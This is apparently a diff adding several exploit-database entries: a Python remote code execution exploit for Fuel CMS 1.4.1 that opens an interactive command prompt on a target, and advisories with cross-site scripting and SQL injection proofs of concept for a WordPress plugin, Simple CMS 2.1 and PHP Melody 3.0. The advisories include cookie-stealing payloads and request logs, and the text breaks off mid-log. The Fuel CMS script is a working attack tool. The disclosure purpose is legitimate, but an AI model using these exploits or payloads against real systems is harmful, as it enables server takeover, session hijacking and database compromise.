media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY (VULNERABILITY LAB)
|
||||
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
|
63
exploits/php/webapps/50477.py
Executable file
63
exploits/php/webapps/50477.py
Executable file
|
@ -0,0 +1,63 @@
|
|||
# Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (3)
|
||||
# Exploit Author: Padsala Trushal
|
||||
# Date: 2021-11-03
|
||||
# Vendor Homepage: https://www.getfuelcms.com/
|
||||
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
|
||||
# Version: <= 1.4.1
|
||||
# Tested on: Ubuntu - Apache2 - php5
|
||||
# CVE : CVE-2018-16763
|
||||
|
||||
#!/usr/bin/python3
|
||||
|
||||
import requests
|
||||
from urllib.parse import quote
|
||||
import argparse
|
||||
import sys
|
||||
from colorama import Fore, Style
|
||||
|
||||
def get_arguments():
|
||||
parser = argparse.ArgumentParser(description='fuel cms fuel CMS 1.4.1 - Remote Code Execution Exploit',usage=f'python3 {sys.argv[0]} -u <url>',epilog=f'EXAMPLE - python3 {sys.argv[0]} -u http://10.10.21.74')
|
||||
|
||||
parser.add_argument('-v','--version',action='version',version='1.2',help='show the version of exploit')
|
||||
|
||||
parser.add_argument('-u','--url',metavar='url',dest='url',help='Enter the url')
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
if len(sys.argv) <=2:
|
||||
parser.print_usage()
|
||||
sys.exit()
|
||||
|
||||
return args
|
||||
|
||||
|
||||
args = get_arguments()
|
||||
url = args.url
|
||||
|
||||
if "http" not in url:
|
||||
sys.stderr.write("Enter vaild url")
|
||||
sys.exit()
|
||||
|
||||
try:
|
||||
r = requests.get(url)
|
||||
if r.status_code == 200:
|
||||
print(Style.BRIGHT+Fore.GREEN+"[+]Connecting..."+Style.RESET_ALL)
|
||||
|
||||
|
||||
except requests.ConnectionError:
|
||||
print(Style.BRIGHT+Fore.RED+"Can't connect to url"+Style.RESET_ALL)
|
||||
sys.exit()
|
||||
|
||||
while True:
|
||||
cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET_ALL)
|
||||
|
||||
main_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27"
|
||||
|
||||
r = requests.get(main_url)
|
||||
|
||||
#<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
|
||||
|
||||
output = r.text.split('<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">')
|
||||
print(output[0])
|
||||
if cmd == "exit":
|
||||
break
|
44
exploits/php/webapps/50479.txt
Normal file
44
exploits/php/webapps/50479.txt
Normal file
|
@ -0,0 +1,44 @@
|
|||
# Exploit Title: WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS)
|
||||
# Date: 03/11/2021
|
||||
# Exploit Author: Luca Schembri
|
||||
# Vendor Homepage: https://www.essentialplugin.com/
|
||||
# Software Link: https://wordpress.org/plugins/popup-anything-on-click/
|
||||
# Version: < 2.0.4
|
||||
|
||||
** Summary **
|
||||
|
||||
A user with a low privileged user can perform XSS-Stored attacks.
|
||||
|
||||
|
||||
** Plugin description **
|
||||
|
||||
Popup Anything is the best popup builder and marketing plugin that
|
||||
helps you get more email subscribers, increase sales and grow your
|
||||
business.
|
||||
|
||||
|
||||
Manage powerful modal popup for your WordPress blog or website. You
|
||||
can add an unlimited popup with your configurations.
|
||||
|
||||
|
||||
** Vulnerable page **
|
||||
|
||||
http://{WEBSITE}/wp-admin/post.php?post={ID}&action=edit
|
||||
|
||||
|
||||
** PoC **
|
||||
|
||||
Go on the "Popup Anything - Settings" tab and select "Simple Link" as
|
||||
"Link Type". Select "Link Test" and use this payload:
|
||||
|
||||
test" onclick="alert(1)
|
||||
|
||||
Save the popup and reload the page. Now click on "Link Text" and it
|
||||
will execute the javascript code
|
||||
|
||||
The same attack can be exploited with "Button Text" and "Popup width" fields.
|
||||
|
||||
|
||||
** Remediation **
|
||||
|
||||
Upgrade to 2.0.4 version or later
|
246
exploits/php/webapps/50482.txt
Normal file
246
exploits/php/webapps/50482.txt
Normal file
|
@ -0,0 +1,246 @@
|
|||
# Exploit Title: Simplephpscripts Simple CMS 2.1 - 'Multiple' Stored Cross-Site Scripting (XSS)
|
||||
# Date: 2021-10-19
|
||||
# Exploit Author: Vulnerability Lab
|
||||
# Vendor Homepage: https://simplephpscripts.com/simple-cms-php
|
||||
# Version: 2.1
|
||||
# Tested on: Linux
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
Simplephpscripts Simple CMS v2.1 - Persistent Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2302
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2021-10-19
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2302
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
5.3
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
Cross Site Scripting - Persistent
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
500€ - 1.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
The system could be used only in already existing websites to control their page sections and contents.
|
||||
Just paste a single line of code on your web page section and start controlling it through the admin area.
|
||||
Very simple installation - one step installation wizard. Option to include contents into web page sections
|
||||
through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and
|
||||
format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders.
|
||||
|
||||
(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the Simplephpscripts Simple CMS v2.1 web-application.
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Simplephpscripts
|
||||
Product: Simple CMS v2.1 - Content Management System (Web-Application)
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2021-09-03: Researcher Notification & Coordination (Security Researcher)
|
||||
2021-09-04: Vendor Notification (Security Department)
|
||||
2021-**-**: Vendor Response/Feedback (Security Department)
|
||||
2021-**-**: Vendor Fix/Patch (Service Developer Team)
|
||||
2021-**-**: Security Acknowledgements (Security Department)
|
||||
2021-10-19: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Full Authentication (Admin/Root Privileges)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
Low User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Responsible Disclosure
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A persistent input validation web vulnerability has been discovered in the Simplephpscripts Simple CMS v2.1 web-application.
|
||||
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
|
||||
browser to web-application requests from the application-side.
|
||||
|
||||
The persistent cross site web vulnerability is located in `name`, `username`, `password` parameters of the `newUser`
|
||||
or `editUser` modules. Remote attackers with privileged application user account and panel access are able to inject
|
||||
own malicious script code as credentials. The injected code executes on preview of the users list. The request method
|
||||
to inject is post and the attack vector is persistent.
|
||||
|
||||
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
|
||||
external redirects to malicious source and persistent manipulation of affected application modules.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] newUser
|
||||
[+] editUser
|
||||
|
||||
Vulnerable File(s):
|
||||
[+] admin.php?act=users
|
||||
|
||||
Vulnerable Input(s):
|
||||
[+] Name
|
||||
[+] Username
|
||||
[+] Password
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] name
|
||||
[+] username
|
||||
[+] password
|
||||
|
||||
Affected Module(s):
|
||||
[+] Users (act=users) (Backend)
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent input validation web vulnerability can be exploited by remote attackers with privileged account and with low user interaction.
|
||||
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
PoC: Payload
|
||||
"><img src='31337'onerror=alert(0)></img>
|
||||
|
||||
|
||||
Vulnerable Source: admin.php?act=users
|
||||
<tbody><tr>
|
||||
<td class="headlist"><a href="admin.php?act=users&orderType=DESC&orderBy=name">Name</a></td>
|
||||
<td class="headlist" width="23%"><a href="admin.php?act=users&orderType=DESC&orderBy=email">Email</a></td>
|
||||
<td class="headlist" width="23%"><a href="admin.php?act=users&orderType=DESC&orderBy=username">Username</a></td>
|
||||
<td class="headlist" width="23%">Password</td>
|
||||
<td class="headlist" colspan="2"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="bodylist">c"><img src='31337'onerror=alert(0)></img></td>
|
||||
<td class="bodylist">keymaster23@protonmail.com</td>
|
||||
<td class="bodylist">d"><img src='31337'onerror=alert(0)></img></td>
|
||||
<td class="bodylist">e"><img src='31337'onerror=alert(0)></img></td>
|
||||
<td class="bodylistAct"><a href="admin.php?act=editUser&id=7" title="Edit"><img class="act" src="images/edit.png" alt="Edit"></a></td>
|
||||
<td class="bodylistAct"><a class="delete" href="admin.php?act=delUser&id=7" onclick="return confirm('Are you sure you want to delete it?');"
|
||||
title="DELETE"><img class="act" src="images/delete.png" alt="DELETE"></a></td>
|
||||
</tr>
|
||||
|
||||
|
||||
--- PoC Session Logs (POST) [Create] ---
|
||||
https://simple-cms.localhost:8000/simplecms/admin.php
|
||||
Host: simple-cms.localhost:8000
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 141
|
||||
Origin: https://simple-cms.localhost:8000
|
||||
Connection: keep-alive
|
||||
Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
|
||||
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
|
||||
act=addUser&name=c"><img src='31337'onerror=alert(0)></img>&email=tester23@test.de
|
||||
&username=d"><img src='31337'onerror=alert(0)></img>
|
||||
&password=e"><img src='31337'onerror=alert(0)></img>&submit=Add User
|
||||
-
|
||||
POST: HTTP/2.0 200 OK
|
||||
server: Apache
|
||||
content-length: 5258
|
||||
content-type: text/html; charset=UTF-8
|
||||
-
|
||||
https://simple-cms.localhost:8000/simplecms/31337
|
||||
Host: simple-cms.localhost:8000
|
||||
Accept: image/webp,*/*
|
||||
Connection: keep-alive
|
||||
Referer: https://simple-cms.localhost:8000/simplecms/admin.php
|
||||
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
|
||||
-
|
||||
GET: HTTP/2.0 200 OK
|
||||
server: Apache
|
||||
content-length: 196
|
||||
content-type: text/html; charset=iso-8859-1
|
||||
|
||||
|
||||
|
||||
Reference(s):
|
||||
https://simple-cms.localhost:8000/simplecms/admin.php
|
||||
https://simple-cms.localhost:8000/simplecms/admin.php
|
||||
https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY (VULNERABILITY LAB)
|
||||
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
|
||||
LUDWIG-ERHARD STRAßE 4
|
||||
34131 KASSEL - HESSEN
|
||||
DEUTSCHLAND (DE)
|
225
exploits/php/webapps/50483.txt
Normal file
225
exploits/php/webapps/50483.txt
Normal file
|
@ -0,0 +1,225 @@
|
|||
# Exploit Title: Simplephpscripts Simple CMS 2.1 - 'Multiple' SQL Injection
|
||||
# Date: 2021-10-19
|
||||
# Exploit Author: Vulnerability Lab
|
||||
# Vendor Homepage: https://simplephpscripts.com/simple-cms-php
|
||||
# Version: 2.1
|
||||
# Tested on: Linux
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
Simplephpscripts Simple CMS v2.1 - SQL Injection
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2303
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2021-10-19
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2303
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
7.1
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
SQL Injection
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
500€ - 1.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
The system could be used only in already existing websites to control their page sections and contents.
|
||||
Just paste a single line of code on your web page section and start controlling it through the admin area.
|
||||
Very simple installation - one step installation wizard. Option to include contents into web page sections
|
||||
through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and
|
||||
format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders.
|
||||
|
||||
(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the Simplephpscripts Simple CMS v2.1 web-application.
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Simplephpscripts
|
||||
Product: Simple CMS v2.1 - Content Management System (Web-Application)
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2021-09-03: Researcher Notification & Coordination (Security Researcher)
|
||||
2021-09-04: Vendor Notification (Security Department)
|
||||
2021-**-**: Vendor Response/Feedback (Security Department)
|
||||
2021-**-**: Vendor Fix/Patch (Service Developer Team)
|
||||
2021-**-**: Security Acknowledgements (Security Department)
|
||||
2021-10-19: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Restricted Authentication (Moderator Privileges)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
No User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Independent Security Research
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A remote sql-injection vulnerability has been discovered in the official creative zone web-application.
|
||||
The vulnerability allows remote attackers to inject or execute own sql commands to compromise the dbms
|
||||
or file system of the application.
|
||||
|
||||
The sql-injection web vulnerability is located in the `newUser` and `editUser` function of the `users` module in
|
||||
the `admin.php` file. Remote attackers with privileged access to the panel are able to add users. If a user account
|
||||
already exists like for example the admin account, each add of the same name or email values results in a unfiltered
|
||||
mysql exception. The exception is not filtered and sanitized. Thus allows privileged attackers to inject and execute
|
||||
own sql commands on the affected database management system to compromise. The request method to inject is post and
|
||||
the attack vector is non-persistent.
|
||||
|
||||
Exploitation of the sql injection vulnerability requires user interaction and a privileged web-application user account.
|
||||
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] newUser
|
||||
[+] editUser
|
||||
|
||||
Vulnerable File(s):
|
||||
[+] admin.php?act=users
|
||||
|
||||
Vulnerable Input(s):
|
||||
[+] Name
|
||||
[+] Username
|
||||
[+] Password
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] name
|
||||
[+] username
|
||||
[+] password
|
||||
|
||||
Affected Module(s):
|
||||
[+] Users (act=users) (Backend)
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The remote sql-injection web vulnerability can be exploited by remote attackers with privileged account and without user interaction.
|
||||
For security demonstration or to reproduce the sql injection vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
PoC: Example
|
||||
act=addUser&name=[ADD EXISITING DEFAULT VALUE!]&email=test@test.de&username=[ADD EXISITING DEFAULT VALUE!]&password=[ADD EXISITING DEFAULT VALUE!]&submit=Add User
|
||||
|
||||
|
||||
PoC: Exploitation
|
||||
act=addUser&name=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&email=test@test.de&username=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&password=a-1'&submit=Add User
|
||||
|
||||
|
||||
--- PoC Session Logs (POST) ---
|
||||
https://simple-cms.localhost:8000/simplecms/admin.php
|
||||
Host: simple-cms.localhost:8000
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 132
|
||||
Origin: https://simple-cms.localhost:8000
|
||||
Connection: keep-alive
|
||||
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
|
||||
act=addUser&name=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&email=test@test.de&username=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&password=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&submit=Add User
|
||||
-
|
||||
POST: HTTP/2.0 200 OK
|
||||
server: Apache
|
||||
content-length: 1224
|
||||
content-type: text/html; charset=UTF-8
|
||||
|
||||
|
||||
--- SQL Error Exception Logs ---
|
||||
Error: SELECT * FROM cms2_users WHERE username='a%20-1'
|
||||
Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%20-1'' at line 1
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
1. Disallow sql-errors to be displayed in the frontend and backend. Disable to redisplay the broken or malicious query on client-side.
|
||||
2. Use prepared statement to protect the sql query of the post method request
|
||||
3. Restrict the post parameters by disallow the usage of special chars with single or double quotes
|
||||
4. Setup a filter or validation class to deny broken or manipulated sql queries
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY (VULNERABILITY LAB)
|
||||
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
|
||||
LUDWIG-ERHARD STRAßE 4
|
||||
34131 KASSEL - HESSEN
|
||||
DEUTSCHLAND (DE)
|
282
exploits/php/webapps/50486.txt
Normal file
282
exploits/php/webapps/50486.txt
Normal file
|
@ -0,0 +1,282 @@
|
|||
# Exploit Title: PHP Melody 3.0 - 'Multiple' Cross-Site Scripting (XSS)
|
||||
# Date: 2021-10-20
|
||||
# Exploit Author: Vulnerability Lab
|
||||
# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
|
||||
# Version: v3
|
||||
# Tested on: Linux
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
PHP Melody v3.0 - Multiple Cross Site Web Vulnerabilities
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2290
|
||||
|
||||
Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2021-10-20
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2290
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
5
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
Cross Site Scripting - Non Persistent
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
500€ - 1.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing.
|
||||
Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series,
|
||||
TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.
|
||||
|
||||
(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered multiple non-persistent cross site scripting vulnerabilities in the PHP Melody v3.0 video cms web-application.
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
PHPSUGAR
|
||||
Product: PHP Melody v3.0 - Video CMS (Web-Application)
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2021-09-01: Researcher Notification & Coordination (Security Researcher)
|
||||
2021-09-02: Vendor Notification (Security Department)
|
||||
2021-09-04: Vendor Response/Feedback (Security Department)
|
||||
2021-09-22: Vendor Fix/Patch (Service Developer Team)
|
||||
2021-09-22: Security Acknowledgements (Security Department)
|
||||
2021-10-20: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Pre Auth (No Privileges or Session)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
Low User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Responsible Disclosure
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
Multiple non-persistent cross site web vulnerabilities has been discovered in the official PHP Melody v3.0 video cms web-application.
|
||||
The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser
|
||||
to web-application requests by the client-side.
|
||||
|
||||
The cross site scripting vulnerabilities are located in the `moved`, `username` and `keyword` parameters of the `categories.php`, `import.php`
|
||||
or `import-user.php` files. The injection point is located in the get method request and the execution occurs with non-persistent attack vector
|
||||
in the status message or exception of the admin panel ui.
|
||||
|
||||
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects
|
||||
to malicious source and non-persistent manipulation of affected application modules.
|
||||
|
||||
Request Method(s):
|
||||
[+] GET
|
||||
|
||||
Vulnerable File(s):
|
||||
[+] categories.php
|
||||
[+] import-user.php
|
||||
[+] import.php
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] move
|
||||
[+] username
|
||||
[+] keyword
|
||||
|
||||
Affected Module(s):
|
||||
[+] Status Message & Exception
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without account and with low user interaction.
|
||||
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
PoC: Payload
|
||||
%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E
|
||||
|
||||
|
||||
PoC: Exploitation
|
||||
https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E
|
||||
-
|
||||
https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E
|
||||
&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1
|
||||
-
|
||||
https://phpmelody.localhost.com:8080/admin/import.php?action=search&keyword=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&results=50&page=1&autofilling=0&autodata=1&oc=1&utc=7&search_category=Comedy&search_orderby=relevance&data_source=youtube&sub_id=4
|
||||
|
||||
|
||||
PoC: Exploit
|
||||
<html>
|
||||
<head><body>
|
||||
<title>PHP Melody v3.0 - XSS PoC Exploit</title>
|
||||
#1
|
||||
<iframe src="https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E" width="200" height="200"> </iframe>
|
||||
#2
|
||||
<iframe src="https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E" width="200" height="200">
|
||||
&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1 </iframe>
|
||||
#3
|
||||
<iframe src="https://phpmelody.localhost.com:8080/admin/import.php?action=search&keyword=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E" width="200" height="200">&results=50&page=1&autofilling=0&autodata=1&oc=1&utc=7&search_category=Comedy&search_orderby=relevance&data_source=youtube&sub_id=4 </iframe>
|
||||
</body></head>
|
||||
</html>
|
||||
|
||||
|
||||
--- PoC Session Logs (GET) (move) ---
|
||||
https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved="><iframe src=evil.source onload=alert(document.cookie)>
|
||||
Host: phpmelody.localhost.com:8080
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Connection: keep-alive
|
||||
Cookie: PHPSESSID=acf50832ffd23b7d11815fa2b8f2e17u;
|
||||
